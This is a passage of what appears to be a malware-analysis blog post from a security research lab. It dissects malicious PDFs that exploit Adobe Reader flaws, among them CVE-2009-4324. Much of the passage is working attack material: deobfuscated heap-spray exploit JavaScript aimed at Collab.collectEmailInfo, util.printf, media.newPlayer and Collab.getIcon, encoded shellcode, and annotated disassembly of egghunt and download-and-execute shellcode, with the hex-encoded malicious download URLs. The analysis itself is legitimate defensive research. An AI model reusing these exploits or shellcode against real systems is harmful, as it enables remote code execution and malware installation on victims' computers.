}A_p_p7p2__u2x[O86U_8] = aD3K_EP_v_WML61;O86U_8++;}S8_T83_ajR = A_p_p7p2__u2x[0].length ? 0 : 1;A_p_p7p2__u2x[O86U_8] = "00";A_p_p7p2__u2x[O86U_8 + 1] = "00";O86U_8 += 2;if ((A_p_p7p2__u2x.length - S8_T83_ajR) % 2) {A_p_p7p2__u2x[O86U_8] = "00";}while(S8_T83_ajR < A_p_p7p2__u2x.length) {nd__8__O_E6 += "%u" + A_p_p7p2__u2x[S8_T83_ajR + 1] + A_p_p7p2__u2x[S8_T83_ajR];S8_T83_ajR += 2;}nd__8__O_E6 += "%u0000";return nd__8__O_E6;}function jM77Vg3(x56C0_13__c, DcG_u7V_L_s_uJ){while (x56C0_13__c.length*2<DcG_u7V_L_s_uJ) {x56C0_13__c += x56C0_13__c;}x56C0_13__c = x56C0_13__c.substring(0,DcG_u7V_L_s_uJ/2);return x56C0_13__c;}function EU_xp43s(cF_t_wgG__usi_4, gtPWfQ6O, l6__x_1d){var h_2G_2 = 0x0c0c0c0c;var x56C0_13__c = unescape(gtPWfQ6O);var G_Rp3BOccXCA = w4U_ES(cF_t_wgG__usi_4, l6__x_1d);var m8Lnd5_UsJ1f = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050&
[egghunt…]%u3350%uc3c0");var H_O610_85G = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%u9090%u00e8%u0000%ueb00%ue900%u00fc
[shellcode…]
%u3438%u3861%u3361%u3239";app.hVDwfx478 = unescape(Bsv_7_w_r_Vmg(H_O610_85G, G_Rp3BOccXCA));var eY_mn_7_k_Uqk5 = 0x400000;var l825oJ_81__Ny = m8Lnd5_UsJ1f.length * 2;var DcG_u7V_L_s_uJ = eY_mn_7_k_Uqk5 - (l825oJ_81__Ny+0x38);x56C0_13__c = jM77Vg3(x56C0_13__c, DcG_u7V_L_s_uJ);var qj76_s_0_PgMBT = (h_2G_2 - 0x400000)/eY_mn_7_k_Uqk5;for (var Mg_70_P__N_D = 0; Mg_70_P__N_D < qj76_s_0_PgMBT; Mg_70_P__N_D++) {I8tR_yfW_B_G_4[Mg_70_P__N_D] = x56C0_13__c + m8Lnd5_UsJ1f;}}function Ecbg_08LGeWT0(){var SgNX5d = "";for (S8_T83_ajR = 0; S8_T83_ajR < 12; S8_T83_ajR++) {SgNX5d += unescape("%u0c0c%u0c0c");}var PoLA_T6Aa7KrU1s = "";for (S8_T83_ajR = 0; S8_T83_ajR < 750; S8_T83_ajR++) {PoLA_T6Aa7KrU1s += SgNX5d;}this.collabStore = Collab.collectEmailInfo({subj: "", msg: PoLA_T6Aa7KrU1s});app.clearTimeOut(co3L10RH0e_sDj);}function I_w1ifF(o64O_1QbXw){var D__c6_R_Y_qv = co3L10RH0e_sDj;if ((o64O_1QbXw >= 8 && o64O_1QbXw < 8.11) || o64O_1QbXw < 7.1) {EU_xp43s(23, "%u0c0c%u0c0c", o64O_1QbXw);Ecbg_08LGeWT0();} if (D__c6_R_Y_qv) {app.clearTimeOut(D__c6_R_Y_qv);}}var l6__x_1d = 0;var K_U2Nj7_X_3__k = app.plugIns;for (var clWu_2 = 0; clWu_2 < K_U2Nj7_X_3__k.length; clWu_2++) {var A_x_Hr7 = K_U2Nj7_X_3__k[clWu_2].version;if (A_x_Hr7 > l6__x_1d) { l6__x_1d = A_x_Hr7; }}if (app.viewerVersion == 9.103 && l6__x_1d < 9.13) {l6__x_1d = 9.13;}app.C_1aWSr__pbK_tN = I_w1ifF;co3L10RH0e_sDj = app.setTimeOut("app.C_1aWSr__pbK_tN(" + l6__x_1d.toString() + ")", 50);
Editorial About Parsing PDFs
Congratulations! If you've made it this far, you're much further along than most PDF scanners. Most don't make it past the getAnnots()
call. And, in the future, things are only going to get worse. There are thousands and thousands of object properties available from inside the Acrobat Javascript environment.
To fully parse, not only must you do everything in these:
- JavaScript for Acrobat API Reference 8.1
- PDF 1.7 Reference ISO 32000-1:2008
- PDF Reference and Adobe Extensions to the PDF Specification (ISO 32000-1:2008)
for completeness
But you must also handle error cases in the exact same way that Acrobat does. Your parser must be bug-compatible with Acrobat. And, OMG, the things you can do inside of a PDF. (Which I'll decline to say at the moment, lest I give anyone any ideas about new obfuscation techniques. Not that obfuscation poses any problems for us…)
Q: So how does FireEye parse PDFs?
A: We use Adobe Acrobat versions 7, 8, and 9 to parse and execute the file.
Oh this is telling...
ISO 32000-1:2008 specifies a digital form for representing electronic documents to enable users to exchange and view electronic documents independent of the environment in which they were created or the environment in which they are viewed or printed. It is intended for the developer of software that creates PDF files (conforming writers), software that reads existing PDF files and interprets their contents for display and interaction (conforming readers) and PDF products that read and/or write PDF files for a variety of other purposes (conforming products).
ISO 32000-1:2008 does not specify the following:
- specific processes for converting paper or electronic documents to the PDF format;
- specific technical design, user interface or implementation or operational details of rendering;
- specific physical methods of storing these documents such as media and storage conditions;
- →methods for validating the conformance of PDF files or readers;←
- required computer hardware and/or operating system.
Shellcode
There are two chunks of shellcode; One is Skape's old Egghunt shellcode (Using the egg value 0x9050905090509050), and a common URLMon download and winexec() shellcode (I've seen it in a lot of malware lately, and in a post on some Chinese message board.)
Egghunt Shellcode
Just go read this: egghunt.c
00000000 90 nop
00000001 90 nop
00000002 90 nop
00000003 90 nop
00000004 90 nop
00000005 90 nop
00000006 EB21 jmp short 0x29
00000008 59 pop ecx
00000009 B850905090 mov eax,0x90509050
0000000E 51 push ecx
0000000F 6AFF push byte -0x1
00000011 33DB xor ebx,ebx
00000013 648923 mov [fs:ebx],esp
00000016 6A02 push byte +0x2
00000018 59 pop ecx
00000019 8BFB mov edi,ebx
0000001B F3AF repe scasd
0000001D 7507 jnz 0x26
0000001F FFE7 jmp edi
00000021 6681CBFF0F or bx,0xfff
00000026 43 inc ebx
00000027 EBED jmp short 0x16
00000029 E8DAFFFFFF call 0x8
0000002E 6A0C push byte +0xc
00000030 59 pop ecx
00000031 8B040C mov eax,[esp+ecx]
00000034 B1B8 mov cl,0xb8
00000036 83040806 add dword [eax+ecx],byte +0x6
0000003A 58 pop eax
0000003B 83C410 add esp,byte +0x10
0000003E 50 push eax
0000003F 33C0 xor eax,eax
00000041 C3 ret
Download to File and Exec
I started to comment this, because I haven't actually found a marked up version of it via Google, but I was also supposed to have had this blog post done last week. So I'll document the rest of this at a later date. There are actually two samples here, but they only differ by a few instructions, so I've written in the differences in inline comments.
00000000 90 nop
00000001 90 nop
00000002 90 nop
00000003 90 nop
00000004 90 nop
00000005 90 nop
00000006 90 nop
00000007 90 nop
00000008 90 nop
00000009 90 nop
0000000A E800000000 call 0xf ; Leave EIP on the stack for later
0000000F EB00 jmp short 0x11 ; i.e. the base address of this shellcode
00000011 E9FC000000 jmp 0x112 ; Get EIP again, base address of offset 0x112
00000016 5F pop edi ; EDI = EIP = The end
00000017 64A130000000 mov eax,[fs:0x30] ; PEB
0000001D 780C js 0x2b ; Check if Windows 95
0000001F 8B400C mov eax,[eax+0xc] ; PROCESS_MODULE_INFO
00000022 8B701C mov esi,[eax+0x1c] ; *flink
00000025 AD lodsd ; EAX = *blink
00000026 8B6808 mov ebp,[eax+0x8] ; EBP = kernel32 module base address
00000029 EB09 jmp short 0x34
0000002B 8B4034 mov eax,[eax+0x34] ; Windows 9x boilerplate
0000002E 8D407C lea eax,[eax+0x7c] ; Because everyone just copies everyone
00000031 8B683C mov ebp,[eax+0x3c] ; else's (Skape's) shellcode
00000034 8BF7 mov esi,edi ; ESI = The end, and beginning of hashes
00000036 6A04 push byte +0x4
00000038 59 pop ecx ; ECX = 0x00000004
00000039 E88F000000 call 0xcd ; find_functions
0000003E E2F9 loop 0x39
00000040 686F6E0000 push dword 0x6e6f ;
00000045 6875726C6D push dword 0x6d6c7275 ; "urlmon"
0000004A 54 push esp
0000004B FF16 call near [esi] ; loadLibraryA
0000004D 8BE8 mov ebp,eax
0000004F E879000000 call 0xcd
00000054 8BD7 mov edx,edi
00000056 47 inc edi ;
00000057 803F00 cmp byte [edi],0x0
0000005A 75FA jnz 0x56 ; End of string
0000005C 47 inc edi ; Skip null
0000005D 57 push edi ; Beginning of next string
0000005E 47 inc edi ;
0000005F 803F00 cmp byte [edi],0x0
00000062 75FA jnz 0x5e
00000064 8BEF mov ebp,edi ; EDI points to end of string
00000066 5F pop edi ; EDI Beginning of string
00000067 33C9 xor ecx,ecx
00000069 81EC04010000 sub esp,0x104 ; make 260 bytes of space
0000006F 8BDC mov ebx,esp
; This is the first instruction that these two samples diverge on:
; Only one of them has this.
; 00000071 83C30C add ebx,byte +0xc ; Leave 12 bytes of space for "regsrv32 -s "
00000071 51 push ecx ; 0
00000072 52 push edx ;
00000073 53 push ebx ; End of string
00000074 6804010000 push dword 0x104 ; 260
00000079 FF560C call near [esi+0xc] ; GetTempPathA
0000007C 5A pop edx
0000007D 59 pop ecx ;
0000007E 51 push ecx ; jump target from 0xC8
0000007F 52 push edx
00000080 8B02 mov eax,[edx]
00000082 53 push ebx ; Filename
00000083 43 inc ebx
00000084 803B00 cmp byte [ebx],0x0
00000087 75FA jnz 0x83 ; EBX points to end
00000089 817BFC2E657865 cmp dword [ebx-0x4],0x6578652e ; Ends with ".exe"?
; The other version of this shellcode uses ".dll" rather than ".exe"
; 0000008C 817BFC2E646C6C cmp dword [ebx-0x4],0x6c6c642e ; ".dll"
00000090 7503 jnz 0x95
00000092 83EB08 sub ebx,byte +0x8
00000095 8903 mov [ebx],eax ; Doesn't end with ".exe"
00000097 C743042E657865 mov dword [ebx+0x4],0x6578652e ; So append ".exe"
; Again with the DLL
; C743042E646C6C mov dword [ebx+0x4],0x6c6c642e ; ".dll"
0000009E C6430800 mov byte [ebx+0x8],0x0 ; ".exe\0"
000000A2 5B pop ebx
000000A3 8AC1 mov al,cl
000000A5 0430 add al,0x30
000000A7 884500 mov [ebp+0x0],al
000000AA 33C0 xor eax,eax
000000AC 50 push eax ; NULL lpfnCB
000000AD 50 push eax ; NULL dwReserved
000000AE 53 push ebx ; szFileName
000000AF 57 push edi ; szURL
000000B0 50 push eax ; NULL pCaller
000000B1 FF5610 call near [esi+0x10] ; URLDownloadToFileA
000000B4 83F800 cmp eax,byte +0x0 ; Download ok?
000000B7 7506 jnz 0xbf
000000B9 6A01 push byte +0x1 ; SW_SHOWNORMAL maybe?
; The alternative version executes "regsvr32 -s " rather than just a tempfile EXE name
; 83EB0C sub ebx,byte +0xc ; back up 12 bytes from beginning
; C70372656773 mov dword [ebx],0x73676572 ; "regs"
; C7430476723332 mov dword [ebx+0x4],0x32337276 ; "vr32"
; C74308202D7320 mov dword [ebx+0x8],0x20732d20 ; " -s "
000000BB 53 push ebx ; Command Line
000000BC FF5604 call near [esi+0x4] ; WinExec
000000BF 5A pop edx
000000C0 59 pop ecx
000000C1 83C204 add edx,byte +0x4
000000C4 41 inc ecx
000000C5 803A00 cmp byte [edx],0x0
000000C8 75B4 jnz 0x7e
000000CA FF5608 call near [esi+0x8] ; ExitProcess
find_functions:
000000CD 51 push ecx ; 0x00000004
000000CE 56 push esi ; The end (0x117)
000000CF 8B753C mov esi,[ebp+0x3c] ; PE header VMA
000000D2 8B742E78 mov esi,[esi+ebp+0x78] ; Export table relative offset
; This is just an alternative coding of the same instruction, X86 is full of things like this
; 8B743578 mov esi,[ebp+esi+0x78]
000000D6 03F5 add esi,ebp ; Export table VMA
000000D8 56 push esi
000000D9 8B7620 mov esi,[esi+0x20] ; Names table relative offset
000000DC 03F5 add esi,ebp ; esi = Names table VMA
000000DE 33C9 xor ecx,ecx ;
000000E0 49 dec ecx ; ecx = 0xffffffff
000000E1 41 inc ecx ; jmp from 0xF8
000000E2 AD lodsd ; eax = *esi = *Names table VMA
000000E3 03C5 add eax,ebp
000000E5 33DB xor ebx,ebx
000000E7 0FBE10 movsx edx,byte [eax] ; next entry
000000EA 3AD6 cmp dl,dh ; check for NULL (at end of table)
; Another alternative coding. This seems to imply the original source was symbolic,
; and (re)compiled/assembled to create the other version.
; 38F2 cmp dl,dh
000000EC 7408 jz 0xf6
000000EE C1CB0D ror ebx,0xd ; compute hash
000000F1 03DA add ebx,edx ; compute hash ebx = accumulator
000000F3 40 inc eax
000000F4 EBF1 jmp short 0xe7
000000F6 3B1F cmp ebx,[edi]
000000F8 75E7 jnz 0xe1
000000FA 5E pop esi
000000FB 8B5E24 mov ebx,[esi+0x24] ; Ordinals table relative offset
000000FE 03DD add ebx,ebp ; Ordinals table VMA
00000100 668B0C4B mov cx,[ebx+ecx*2] ; Extrapolate function's ordinal
00000104 8B5E1C mov ebx,[esi+0x1c] ; Address table relative offset
00000107 03DD add ebx,ebp ; Address table VMA
00000109 8B048B mov eax,[ebx+ecx*4] ; Extract the relative function offset from its ordinal
0000010C 03C5 add eax,ebp ; Function VMA
0000010E AB stosd ; *edi = eax
0000010F 5E pop esi
00000110 59 pop ecx
00000111 C3 ret
00000112 E8FFFEFFFF call 0x100000016 ; Get EIP *here = End of shellcode
00000117 db 8e 4e 0e ec ; [ESI+0] 0xec0e4e8e LoadLibraryA
0000011B db 98 fe 8a 0e ; [ESI+4] 0x0e8afe98 WinExec
0000011F db 7e d8 e2 73 ; [ESI+8] 0x73e2d87e ExitProcess
00000123 db 33 ca 8a 5b ; [ESI+C] 0x5b8aca33 GetTempPathA
00000127 db 36 1a 2f 70 ; [ESI+10] 0x702f1a36 URLDownloadToFileA
0000012B db 6b 74 47 6f 00 ; "ktGo" ??
;Alt: db 6c 4c 70 6f 00 ; "lLpo" ??
0000014A 68 74 74 70 3a 2f ; http:/
00000150 2f 67 6f 6f 67 6c 65 2e 63 6f 6d 2e 61 6e 61 6c ; /google.com.anal
00000160 79 74 69 63 73 2e 65 69 63 79 78 74 61 65 63 75 ; ytics.eicyxtaecu
00000170 6e 2e 63 6f 6d 2f 6e 74 65 2f 41 56 4f 52 50 31 ; n.com/nte/AVORP1
00000180 54 52 45 53 54 31 31 2e 70 79 2f 65 48 39 39 39 ; TREST11.py/eH999
00000190 61 34 35 35 31 56 30 31 30 30 66 30 37 30 30 30 ; a4551V0100f07000
000001a0 36 52 30 30 30 30 30 30 30 30 31 30 32 54 64 32 ; 6R00000000102Td2
000001b0 64 63 63 61 37 64 32 30 31 6c 30 34 30 39 4b 39 ; dcca7d201l0409K9
000001c0 31 61 36 38 39 34 38 33 32 30 00 00 ; 1a68948320..
00000130 db 68 74 74 70 3a 2f 2f 6c 61 72 79 6a 75 2e 69 6e ; http://laryju.in
00000140 db 66 6f 2f 63 67 69 2d 62 69 6e 2f 71 77 2f 65 48 ; fo/cgi-bin/qw/eH
00000150 db 33 66 63 37 66 34 39 65 56 30 31 30 30 66 30 36 ; 3fc7f49eV0100f06
00000160 db 30 30 30 36 52 30 30 30 30 30 30 30 30 31 30 32 ; 0006R00000000102
00000170 db 54 36 63 64 63 38 39 37 38 32 30 31 6c 30 34 30 ; T6cdc8978201l040
00000180 db 39 00 ; 9.
Breaking News
So, after I'd already written most of this, another PDF sample showed up, also using similar metadata tricks, but in a different way than these Neosploit samples. I suspect it's a different toolkit, as the PDF is structured differently.
[The URL will be something like http://<ip address>/bbh/pdf.php
.]
This PDF is also exploiting the recent Adobe 0-day CVE-2009-4324 (and a few others for good measure).
You should all know how to read this by now.
(Unless you've skipped over this entire post to here.)
I'm using 323cd2b18026019ab8364efa96893062 for this example
The Javascript segments are referenced like this in the PDF.
9 0 obj
<</Creator (Adobe)
/Title 5 0 R
/Producer 14 0 R
/Author 51 0 R
/CreationDate (D:20080924194756)
>>
endobj
This object (the
) has the exploit:info.Author
51 0 obj
<<
/Filter /FlateDecode
/Length 2630
>>
stream
Decompressed it's "lka166lka175lka16elka163lka174lka169lka16 […]
endstream
endobj
If you don't want to have to deal with all that tedious mucking about with Javascript to decode, just do:
perl -ne 's/lka1//g; print(pack("H*",$_));'
31 0 obj
<< /S /JavaScript /JS 32 0 R >>
endobj
32 0 obj
<<
/Filter /FlateDecode
/Length 159
>>
stream
Uncompressed:
var xyuvam = 'lka';
var z = unescape;
var yhahahahahahavvvvvv = 'p'+z(%6c%61%63%65)+'(/';
eval('var bolshayapizdavam = '%';var nenadoAVscaner = '1/g,bolshayapizdavam)';');
eval('var bu'+'hae'+'ca = ev'+'a'+'l;');
endstream
endobj
33 0 obj
<< /S /JavaScript /JS 34 0 R >>
endobj
34 0 obj
<<
/Filter /FlateDecode
/Length 102
>>
stream
Uncompressed:
buhaeca('var xyuznaet = this.in'+z(%66%6f%2e%61%75%74)+'hor;');
var poxyunavse = 'xyuznaet.re';
endstream
endobj
Obviously,
is %66%6f%2e%61%75%74
fo.aut
, so glueing that all together, it becomes
, otherwise known as Object #51 (See elsewhere).this.info.author;
35 0 obj
<< /S /JavaScript /JS 36 0 R >>
endobj
36 0 obj
<<
/Filter /FlateDecode
/Length 88
>>
stream
Uncompressed:
var lkaa = poxyunavse + yhahahahahahavvvvvv +xyuvam+ nenadoAVscaner;
var xxx = buhaeca(lkaa);
endstream
endobj
37 0 obj
<< /S /JavaScript /JS 38 0 R >>
endobj
38 0 obj
<<
/Filter /FlateDecode
/Length 60
>>
stream
Uncompressed:
var ietoktoewe = z(unescape(xxx));
buhaeca(ietoktoewe);
endstream
endobj
So, one of the odd things about this PDF, is that there are several object names defined, but I don't see them used anywhere. (In short, you can rename objects from
to something easier to remember, like 123 00 R
.)/Bob
48 0 obj
<< /Names [(xyak) 31 0 R (fuckinshit) 33 0 R (komonogirsl) 35 0 R (komonogirsls) 37 0 R ]
>>
endobj
Also Object #5 and Object #14 are empty. This is
and info.Title
respectively.info.Producer
5 0 obj
<<
/Filter /FlateDecode
/Length 0
>>
stream
endstream
endobj
14 0 obj
<<
/Filter /FlateDecode
/Length 0
>>
stream
endstream
endobj
51 0 R Decoded
function fix_it(yarsp,len){while(yarsp.length*2<len){yarsp+=yarsp;}yarsp=yarsp.substring(0,len/2);return yarsp;}
function printd(){var shellcode = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34
%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B
%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324
%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B
%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455
%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF
%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u382F%u2E35%u3031%u322E%u3334%u312E%u3532%u622F%u6862%u6C2F%u616F
%u2E64%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u656E%u0077");var block = unescape("%u0c0c%u0c0c");
var GDagaCuyNfRSFzaSZLO = unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u514e%u4865%u4844%u724f%u4a6e
%u6d43%u4b51%u4b79%u7156%u4d41%u5944%u596b%u7979%u625a%u626f%u7a6e%u634e%u4a4d%u6341%u6253%u4154%u5670%u5543%u4273
%u4c51%u576d%u5772%u5670");while(block.length <= 32768) block+=block;block=block.substring(0,32768 - shellcode.length);
memory=new Array();for(i=0;i<0x2000;i++) {memory[i]= block + shellcode;}util.printd("rlpPpjTXXIncUhwagCzcuHfmkzObBSZDGNdC",
new Date());util.printd("SotSxNQvMqKNjJkIXioKlmfZYfmiPGgGNNKn", new Date());try {this.media.newPlayer(null);} catch(e)
{}util.printd(GDagaCuyNfRSFzaSZLO, new Date());} function util_printf(){var payload=unescape("%uC033%u8B64%u3040
%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44
%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150
%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56
%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865
%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56
%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60
%u0455%u7468%u7074%u2F3A%u382F%u2E35%u3031%u322E%u3334%u312E%u3532%u622F%u6862%u6C2F%u616F%u2E64%u6870%u3F70%u7073
%u3D6C%u6470%u5F66%u6170%u6B63");var nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A"); var heapblock=nop+payload;
var bigblock=unescape("%u0A0A%u0A0A");var headersize=20;var spray=headersize+heapblock.length;
while(bigblock.length<spray){bigblock+=bigblock;} var fillblock=bigblock.substring(0,spray);var block=bigblock.substring(0,bigblock.length-spray);while(block.length+spray<0x40000){block=block+block+fillblock;}
var mem_array=new Array();for(var i=0;i<1400;i++){mem_array[i]=block+heapblock;}
var num=129999999999999999998888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
888888888888888888888888888888888888888888888888888888888888888888;util.printf("%45000f",num);} function collab_email(){
var shellcode=unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44
%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150
%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56
%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865
%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56
%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60
%u0455%u7468%u7074%u2F3A%u382F%u2E35%u3031%u322E%u3334%u312E%u3532%u622F%u6862%u6C2F%u616F%u2E64%u6870%u3F70%u7073
%u3D6C%u6470%u5F66%u6170%u6B63");var mem_array=new Array();var cc=0x0c0c0c0c;var addr=0x400000;var sc_len=shellcode.length*2;
var len=addr-(sc_len+0x38);var yarsp=unescape("%u9090%u9090");yarsp=fix_it(yarsp,len);var count2=(cc-0x400000)/addr;for(
var count=0;count<count2;count++){mem_array[count]=yarsp+shellcode;} var overflow=unescape("%u0c0c%u0c0c");
while(overflow.length<44952){overflow+=overflow;} this.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow});}
function collab_geticon(){if(app.doc.Collab.getIcon){var arry=new Array();var vvpethya=unescape("%uC033%u8B64%u3040%u0C78
%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455
%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA
%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA
%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D
%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856
%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u382F%u2E35%u3031%u322E%u3334%u312E%u3532%u622F%u6862
%u6C2F%u616F%u2E64%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u6170%u6B63");var hWq500CN=vvpethya.length*2;var len=0x400000-(hWq500CN+0x38);
var yarsp=unescape("%u9090%u9090");yarsp=fix_it(yarsp,len);var p5AjK65f=(0x0c0c0c0c-0x400000)/0x400000;for(
var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++){arry[vqcQD96y]=yarsp+vvpethya;} var tUMhNbGw=unescape("%09");
while(tUMhNbGw.length<0x4000){tUMhNbGw+=tUMhNbGw;} tUMhNbGw="N."+tUMhNbGw;app.doc.Collab.getIcon(tUMhNbGw);}}
function PPPDDDFF(){var version=app.viewerVersion.toString();version=version.replace(/\D/g,'');
var varsion_array=new Array(version.charAt(0),version.charAt(1),version.charAt(2));
if((varsion_array[0]==8)&&(varsion_array[1]==0)||(varsion_array[1]==1&&varsion_array[2]<3)){util_printf();}
if((varsion_array[0]<8)||(varsion_array[0]==8&&varsion_array[1]<2&&varsion_array[2]<2)){collab_email();}
if((varsion_array[0]<9)||(varsion_array[0]==9&&varsion_array[1]<1)){collab_geticon();} printd(); } PPPDDDFF();
And these seem to be on this exact same topic
http://isc.sans.org/diary.html?storyid=7906
¹ I'm not 100% certain that it is Neosploit doing this, as I'm only looking at this toolkit's output.
² Neosploit and Mebroot go together like peanut butter and chocolate.
³ It looks almost exactly like the simple example in Annex H of the PDF specification.
4 This is a bit of an oversimplification. I'm leaving out all the stuff about cross reference streams, and reconstructing a file if the xref table is damaged or missing.
Julia Wolf @ FireEye Malware Intelligence Lab
Questions/Comments to research [@] fireeye [.] com